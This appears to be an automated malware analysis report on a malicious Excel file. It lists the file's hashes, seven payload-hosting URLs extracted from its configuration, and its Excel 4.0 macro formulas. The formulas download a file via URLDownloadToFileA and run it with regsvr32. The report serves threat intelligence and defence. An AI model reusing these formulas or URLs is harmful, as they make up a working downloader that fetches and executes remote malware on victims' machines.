General
-
Target
5ca569e7566bbc94deeaf0f8c6aac87f5e7d12f508b31f5b67a320c502132daf
-
Size
38KB
-
MD5
e04ffc173ce256475f3b7bc5b8c8b33c
-
SHA1
e71f8f1046456966ada265b5dfd61baf1ee2f9fa
-
SHA256
5ca569e7566bbc94deeaf0f8c6aac87f5e7d12f508b31f5b67a320c502132daf
-
SHA512
33f7c04f2f95e90e814dbadc67f5b17b66c7d66cf3eb04b9d8ef633c8ae74c776dfeec4cc95a1b81058d8c7fc59d555df71d1ae7d6a17dd83bd70bebc04d685f
-
SSDEEP
768:6mcXd/GCR8tijOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooFs:6mqTeSOZZ1ZYpoQ/pMAeVIyTCR
Malware Config
Extracted
https://www.berekethaber.com/dosyalar/4MZnNVw8Z/
https://damjangro.org/data/IlBcH2mM/
https://actwell.fr/logs/cGx7Ll6CB2k0NLWDTcL/
https://www.awam.be/wp-admin/ug9Zz/
https://protokol.mx/Archivos/SjKWNoeYre/
https://alfaomega.dk/wp-includes/P4UN9RYvDCJssgv/
https://bengtverhoef.nl/stats/SJ1csD7/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.berekethaber.com/dosyalar/4MZnNVw8Z/","..\wnru.ocx",0,0) =IF('HUNJK'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://damjangro.org/data/IlBcH2mM/","..\wnru.ocx",0,0)) =IF('HUNJK'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://actwell.fr/logs/cGx7Ll6CB2k0NLWDTcL/","..\wnru.ocx",0,0)) =IF('HUNJK'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.awam.be/wp-admin/ug9Zz/","..\wnru.ocx",0,0)) =IF('HUNJK'!E21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://protokol.mx/Archivos/SjKWNoeYre/","..\wnru.ocx",0,0)) =IF('HUNJK'!E23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://alfaomega.dk/wp-includes/P4UN9RYvDCJssgv/","..\wnru.ocx",0,0)) =IF('HUNJK'!E25<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://bengtverhoef.nl/stats/SJ1csD7/","..\wnru.ocx",0,0)) =IF('HUNJK'!E27<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\wnru.ocx") =RETURN()
Signatures
-
Suspicious Office macro 1 IoCs
Office document equipped with 4.0 macros.
Files
-
5ca569e7566bbc94deeaf0f8c6aac87f5e7d12f508b31f5b67a320c502132daf